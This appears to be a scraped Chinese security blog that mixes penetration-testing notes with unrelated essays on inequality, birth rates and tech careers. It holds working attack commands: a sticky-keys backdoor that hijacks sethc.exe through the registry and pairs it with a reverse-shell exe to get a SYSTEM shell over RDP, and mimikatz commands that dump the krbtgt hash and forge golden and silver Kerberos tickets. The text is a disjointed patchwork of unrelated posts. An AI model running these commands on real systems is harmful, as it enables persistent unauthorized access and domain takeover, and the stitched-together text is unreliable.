linux内核漏洞提权

只要是稍微懈怠一下，上帝会以最快的速度带走你的天赋和能力，一秒钟都不会耽搁。

https://www.bilibili.com/video/BV1Rh411o7M9

前置知识

linux操作系统

不会的，可以看《鸟哥的linux私房菜》

操作

用脚本找内核漏洞

查找exp (修改exp) 上传exp 执行exp

searchsploit

工具链接

linux-exploit-suggester.sh

LinEnum.sh

msf suggester

参考资料

https://github.com/sagishahar-zz/lpeworkshop

从18岁上大学，到今天已经过了近5年。其中我的很多想法都改变了，也有很多还是老样子。就像蝴蝶效应一样，很多年前做的事情，都深深影响着今天我在哪里、做着什么事、成为了什么样的人。我还是很喜欢读书，思考一些一般人觉得无稽之谈，没必要思考的问题。作为一个死宅，还是没能学会与人打交道游刃有余的手段。

最近有一个24岁的女大学生死了，听说是翼装飞行意外事故去世的。

我第一想法是，每年意外事故去世的那么多，为什么她的死亡会上热搜？

这就要深入介绍一下翼装飞行了。翼装飞行是一种刺激的极限运动，很烧钱，比学艺术烧钱多了。

首先要有上百次的高空跳伞经验，才能开始翼装飞行。装备十万起步，数百次跳伞经验，就算花了一百万吧，这是按少了说的。就说刘某（死者）请的教练，是世界顶级水平，就不知道要花多少钱。

这种娱乐，对于她的家庭，应该算不上什么大钱。按照她花了百分之一的钱来玩这些，那么她的家庭至少是千万富翁（当然这是按照保守情况计算的）。再联想一下19年、20年的出生率。我国的贫富差距已经快达到了极限。穷人连一胎都生不起的情况下，富人出生就是富人，世世代代都是富人。这就是资本回报率大于劳动回报率所带来的结果。趋势已经很明显了。

农村出凤凰男的几率越来越小，北京市文科状元熊轩昂说他多亏了家庭和学校的教育，现在的状元都是这种家里又好又厉害的。，说穷人越来越不可能争的过有钱人了。

也许这是一种社会达尔文主义。穷人正在逐渐被社会淘汰。就像古代佃农因为有钱人三妻四妾，而找不到老婆结不起婚一样。 现代996的所谓白领，不过是地主手下成千上万的佃农。

地主以为996是福报，也就算了。可不要身为佃农认为996也是福报。

怎么办

冷嘲热讽说了也没用，那我们应该怎么办呢？韩国人再努力，阶级固化摆在那里，内卷化摆在那里，不出国而在本国努力， 努力的结果都被有钱人收割走了。为什么这么说，假如你努力存钱，存了十年的钱，房价一下子涨了几十万。 那你选择买房，钱不就白存了。劳动被谁收割了？

这就是现实。中国平均福利太差，房价、教育、养老、医疗，压在普通人身上的三座大山，一辈子都被这个套牢了。 一旦你选择结婚生子，那你一辈子的命运已经注定了。你不在为自己而活，你活着就是劳动力，为你的父母、子女、妻子而活。

为什么某些中年男性员工一旦失业，就跳楼呢？不在局中，永远不知道压力有多大。人的悲欢并不相通。

不要轻率评价他人的痛苦。

如果贫富差距一直这么大，会带来什么结果

我们首先看一下美国，这次疫情美国什么表现，我们有目共睹。 美国是一个割裂的社会，富人更容易成为精英、穷人无知而且产业链还迁移到其他国家，导致穷人失去工作。

有很多美国人甚至不知道地球是圆的。公立学校放羊、私立学校要有钱人才读得起。美国用福利把穷人圈起来，用移民撑起了世界霸主的地位。

如果中国的贫富差距这么大。中国不是发达国家，无法用福利引导穷人生育下一代，如果又无法阻止富人在国内赚够钱，带走他们的财产。那么中国的结局似乎已经注定了。毕竟，一个连新生儿人口数都无法撑起来的国家，又怎么能再延续5000年呢？

古代没有避孕措施、没有移民、无法出国留学、工作、也没有老龄化。而现代社会，也无法模拟古代社会来延续下一代。 让我们看看2020年的生育结果吧以及人口普查结果吧。关于这方面我在知乎上高赞的回答，以及我收藏的相关回答都被删了。

比如一个老板，生了二胎、三胎，他雇佣了100名员工，其中百分之20生了二胎，百分之30生了一胎，百分之50不结婚，或者丁克，或者无法生育。那么总和生育率就是73/101 = 0.722

基本上符合资本主义国家不到1.0的生育率。网上搜索一下，始终坚持不到1.0的生育率的国家未来终于会灭亡的。只不过过去是通过战争，今天是通过主动选择了灭亡。

说实话，如果你出生在一个富裕的家庭，你的爸爸是马云、是李刚，那么这些问题都与你无缘。毕竟无产阶级斗争了几千年，断头王后安托瓦内特也就那么一个，文革中被打倒的臭老九也已经是过去式了，这种历史在你短短的几十年中几乎不会再重演了。

韩国网络上近日流行起“勺子阶级论”，这种阶级论把20~39岁年轻人的父母年收入等家庭背景比喻为各种不同的“勺子”，按照家庭背景可分为“金勺”、“银勺”、“铜勺”和“土勺”四个不同阶级。

从具体标准来看，“金勺”指家庭财产高于20亿韩元(约合人民币1143万元)或年收入高于2亿韩元；“银勺”指家庭财产高于10亿韩元或年收入高于1亿韩元；“铜勺”指家庭财产高于5亿韩元或年收入5500万韩元；家庭财产低于5000万韩元或年收入低于2000万韩元的则被称为“土勺”。

韩国20~39岁年轻人面临着就业难、结婚难、低收入等种种问题，这样的境遇让他们相信，无论个人多么努力积累财富，永远不会“富得过”那些继承父母大量遗产的“金汤勺”们。

git

``` git代码版本管理工具 ci工具链的使用

引子

有空再写，没空就自己找答案吧。。

TCP 为什么三次握手而不是两次握手

https://blog.csdn.net/lengxiao1993/article/details/82771768

为了实现可靠数据传输， TCP 协议的通信双方， 都必须维护一个序列号， 以标识发送出去的数据包中， 哪些是已经被对方收到的。为了实现可靠传输，发送方和接收方始终需要同步( SYNchronize )序号。

如果只是两次握手， 至多只有连接发起方的起始序列号能被确认， 另一方选择的序列号则得不到确认

客户端发送一个请求，服务器回复一份序列号，客户端发送我收到了序列号。

工作组和域的区别

1. 大小 工作组比较小，不超过20台。域用在比较大的网络，成百上千台。
2. 拓扑图 工作组中，所有机器的地位是平等的，一台计算机可以自由的加入或退出一个工作组。
3. 验证方式 在工作组中，用户名、密码存放在本地计算机。如果要登入其他计算机，必须提供用户名，密码；在域中，有一台域控（DC）服务器，其他计算机都要通过DC验证才能加入域。有域权限，可以登入任何域内计算机，无需知道计算机的账号也可以登入。
4. 网络 工作组计算机必须在同一个子网中；域的计算机可以在不同的本地网络中。

正向代理和反向代理的区别

正向代理：对服务器来说，客户端是透明的（未知的）。比如说翻墙使用的个人专用服务器，就是正向代理，代理替客户端取回google上的资料，而服务器只知道代理服务器取得了资料，不知道是哪个客户端。

反向代理：对客户端来说，服务端是未知的。比如说nginx可以做负载分流作用的反向代理服务器，作用是当有很多请求的时候，它会将请求分流，发送到不同的服务器，防止单台服务器因为过载而崩溃。于是客户端只知道反向代理服务器替我们取回了请求的资源，而不知道那台具体是哪台服务端发送的。

sql宽字节注入

在cms中，对sql注入使用了addslashes函数，对输入的参数进行了转义，单引号前加上反斜杠进行转义。

在mysql中，使用GBK编码，认为2个字符是一个汉字。在前面加%a1等字符，使前面字符和反斜杠能够组合为一个汉字，于是反斜杠就不能对单引号进行转义了。

cobalt strike的代理

redis未授权的利用过程

linux上好像是 写公钥，利用web服务写马，contrab定时任务 然后windows是利用自启动服务，还有web服务，没有web服务就只能重启

csrf和ssrf的区别

有哪些逻辑漏洞

浏览器同源策略

信息安全行业现状

1994年4月20日，中国正式接入因特网。

至今2020年，历史短短26年。

国内信息安全企业成立时间长的，哪怕是大企业，也就十多年历史。国内院校培养的信息安全人才远远落后于市场要求。而拥有数十年经验的信息安全人才屈指可数。

院校中能够教授信息安全领域渗透测试方向的老师，可以说是几乎没有。

从2018年开始在信息安全领域打杂以来，看到的Sec的博士也很年轻，不过二三十岁。不是鄙视年轻人，医学方向我们都知道老医生比年轻医生更有经验，所以经验也是很重要的。而作为有经验的基础——年龄大，也是一个充分不必要条件。就说业内很有名的黑客余弦、tomkeeper（2001-2020，有近20年的经验），也是拥有着多年的行业经验。

无论是通过信安混口饭吃的、还是以各个大黑阔为目标的各位，都应该踏踏实实努力个十年再说。

虽然

• 现在行业各种标准都十分混乱
• 许多小公司都没有培养人才的能力和愿望
• 很多公司都不注重信息安全
• 很多公司注重 销售>技术人员
• 技术人员承担承担成才时间极长、单干可能性极低，就业面极窄的风险
• 公司更愿意挖人，而不是培养人才 因为挖人只需要付工资，而培养人才，一旦培养成为能够上手工作的熟练人员，那么可能跳槽，所有付出的培养成本都打水漂
• 是风险也是机遇。很多成熟的行业各种管理标准都很完善。只能熬资历、拼学历，入行晚了就没有发挥的空间了。大头利润都由业内前辈抽走。有哪些成熟行业这里就不举例了，免得杠精来杠。

但是只要互联网还存在于地球一天、程序员还是由人类编写为止，信息安全都是不愁被AI取代的、不愁没有工作的。

技术行业的风险

作者：天玹六 链接：https://www.zhihu.com/question/54696826/answer/601826541 来源：知乎 著作权归作者所有，转载请联系作者获得授权。

其实所有技术岗都面临四重风险：门槛极高，成才时间极长，单干可能性极低，就业面极窄，并且越牛B的技术岗这四个特征越发突出。 （举例：诺斯诺普格鲁曼公司的核动力航空母舰造船厂及B2幽灵隐形轰炸机工厂，什么进去了你还想跳出来单干？？还想跳槽？？ 除非你有本事飞出太阳系，否则可能性不是很大）风险总是需要有人承担的，我认为这个点正是中外工业企业一个最本质的差异。

在发达资本主义国家，风险是由企业承担大部分，个人承担小部分（如承诺不裁员，应届生明明没有产出仍然高薪先养着， 技术方向晋升的报酬与管理方向持平甚至略高，行业联盟不搞恶性竞争等，个人往往仅承担行业的系统风险）， 而在我国，就业风险全部由个人承担(如随时裁员，应届生没有产出那就先吃屎，做技术的永远是狗，行业永远只搞恶性竞争)。更加恶劣的是，个人非但需要承担全部风险，大部分企业还会利用技术人员个人命运与企业命运捆绑，放弃工作的成本极高的事实（比如我的放弃成本就足以令90%以上的机械工程师打消放弃的念头，但是与其让我放弃生命的尊严而苟活于机械行业，我宁愿放弃生命，我要不是31岁还能啃老估计现在已经重新投胎了），来压低技术人员的报酬水平。

如果有善良的企业不这样做，就会劣币驱逐良币，反而死得更快。（举例：X东前几年不是很牛逼吗？帮快递小哥交五险一金，呵呵呵，现在是按国家规定交五险一金的X东活不下去，还是不交的X丰X通X达活不下去？以前交多了现在降一点，被千夫所指啊，一开始就不交不就什么事都没有了吗？）

企业这种行为导致的严重后果，我称之为“一代而亡”，即技术员哪怕侥幸能够娶妻生子，他也会拼了老命阻止他的下一代进入自己的行业，说得文绉绉一点，就是“人才断层”。机械人才已经断了多少层，我就不再负能量了。

ps：现在媒体不正视“人才断层”的恶劣现实，还在鼓吹“XX核心研发团队平均年龄不到30岁”“相比起美国企业平均年龄50岁的死气沉沉，我们这边朝气勃发”…我不知道从什么时候开始，我们国家的工程师变得跟妓女一样越年轻越值钱了？拿机械工程师跟妓女相提并论，这也太过抬举机械工程师了吧？每个妓女都用得起iphone，机械工程师用得起吗？

技术岗位，初级过剩高级紧缺

作者：胡嵩 链接：https://www.zhihu.com/question/356982241/answer/1010277323 来源：知乎 著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。

前面有答主已经很简短有力的回答了： 初级过剩，高级紧缺。其实以我这么多年的招聘经验（发出1000+ offer， 面试数倍人）来看， 市场的供给情况比这个还要糟糕， 或者说对于有志在技术领域发展的程序员朋友， 前景比你想象的还要好。 市场上90%的程序员达不到大厂的entry level（准入门槛），也就是狼厂的T3，给到正常应届毕业生的及格线。 注意这个讨论的全集并不是初级程序员， 而是全部相关专业的程序员。也就是说市场上很多工作多年的『资深』程序员也达不到这个标准。 T3是啥要求呢？ 不管是前端、后端、架构还是算法， 只要能 熟练掌握语言和工具 ，靠谱的完成模块级的开发工作。 按照大家的简历描述， 100%肯定都over qualify了。 可真相仍然是， 在所有简历池子里随机抽取100个， 不到10个能通过狼厂T3级别的面试。 光笔试就可以干掉一大半。原因在于两个字： 基础。且不说绝大部分非科班出身的程序员， 压根就没打算把基础打牢固。 就是我们每年去985 211校招的那些对口专业， 真正把基础学好吃透的学生真是太少了。

学java搞服务端的同学， 有多少真搞懂了引用计数和回收机制？做前端的同学有多少真的理解从用户事件触发到页面刷新， 浏览器侧、网络、后端都发生了什么？常见的算法复杂度放到实际应用问题中， 真没几个能答的上来。

这些可能在不少程序员眼中属于日常用不着的冷知识， 可是真的到了生产环境中， 面临实际问题的时候， 这些基础问题就能把简历上写着各种精通、各种熟练的高手们难倒。

能照猫画虎用成熟框架把代码出来是一码事， 能高效交付高质量的工程成果是另一码事。每次大规模校招， 都不免要感慨一下学校的教育和业界的需求脱节。日常的社招， 更让人感叹，大部分程序员的工作都是重复， 没有在技术提升上起到什么作用。所以， 真正有技术追求的朋友们，不要关心统计数据， 机会大把。

参考资料

• https://blog.compass-security.com/2018/02/no-need-to-break-in-use-the-backdoor/
• https://mochazz.github.io/2017/07/29/shift/#%E5%81%B7%E5%A4%A9%E6%8D%A2%E6%97%A5
• 2020年5月11日，确定该方法有效。粘滞键后门详述

失败的操作

1
2
3
4
5

cd c:\windows\system32
move sethc.exe sethc.exe.bak			#重命名sethc.exe为sethc.exe.bak
copy /y cmd.exe sethc.exe
全都提示拒绝访问
本地管理员权限不行、system权限也不行。

成功的操作

1
2
3
4
5
6
7

move C:\Users\user\Desktop\p.exe C:\windows\system32\p.exe   #将p.exe移动到另一个地址，p.exe是一个反弹shell的exe.

#需要本地管理员权限
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f

#在登陆面板输入5个shift，即可获得反弹的system权限shell
缺点，在登陆以后，就会丢失反弹连接。

使用场景：在3389远程登陆的时候，无需登陆，调出system权限cmd.exe

实验

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

在受害机器设置user authentication，不需要验证。那么其他机器登入的时候，就会无需验证获得登陆面板。
PS C:\Users\Administrator> REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDtyLayer /t REG_DWORD /d 0

---
受害机器替换cmd.exe，在登陆面板5个shift调出cmd.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f

---
管理员权限命令开启3389远程登陆
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

关闭3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

windows 10 无效
windows 2008 R2 有效

启**辰的面试题

论我国的35岁中年危机

域渗透入门（五）金票据、银票据

参考资料

• https://ldapwiki.com/wiki/Golden%20Ticket
• https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html#introduction-3
• https://www.cnblogs.com/wuxinmengyi/p/11768481.html
• https://www.youtube.com/watch?v=475V07I01J0

录制的视频教程

• 域渗透实践篇（六）黄金票据与白银票据

黄金票据

信息搜集

漏洞利用

1
2
3
4
5
6
7
8

#导出krbtgt的ntlm hash
mimikatz.exe "lsadump::dcsync /domain:0day.org /user:krbtgt" exit

#伪造黄金票据
mimikatz.exe "kerberos::golden /admin:Administrator /domain:0day.org /sid:S-1-5-21-1812960810-2335050734-3517558805 /krbtgt:36f9d9e6d98ecf8307baf4f46ef842a2 /ticket:Administrator.kirbi" exit

#pass the ticket票据传递，获取域管理员权限
mimikatz.exe "kerberos::ptt Administrator.kirbi" exit

白银票据

信息搜集

1
2
3
4
5
6
7
8
9
10

/domain: The FDQN

/user: 要伪造的目标用户/计算机 Target Account/Computer to Impersonate
/ptt: Optional (Will Inject Ticket or you can do with Rubeus)
/service:cifs	服务参数为cifs
/domain    参数为域名
/sid	   参数为域sid (whoami /user)
/target    可能是目标计算机的主机名
/rc4       服务账号的ntml hash
/user      需要伪造的用户名  NTLM Hash of User Password/Computer Password

1
2
3
4
5
6
7
8

#生成了mimikatz.log文件
mimikatz.exe log "privilege::debug" "sekurlsa::logonpasswords" exit

#伪造白银票据，伪造CIFS服务权限
mimikatz.exe "kerberos::golden /domain:0day.org /sid:S-1-5-21-1812960810-2335050734-3517558805 /target:OWA2010SP3.0day.org /service:CIFS /rc4:01832b04fa3aed862548241a387e3342 /user:Administrator /ptt" exit

dir \OWA2010SP3\c$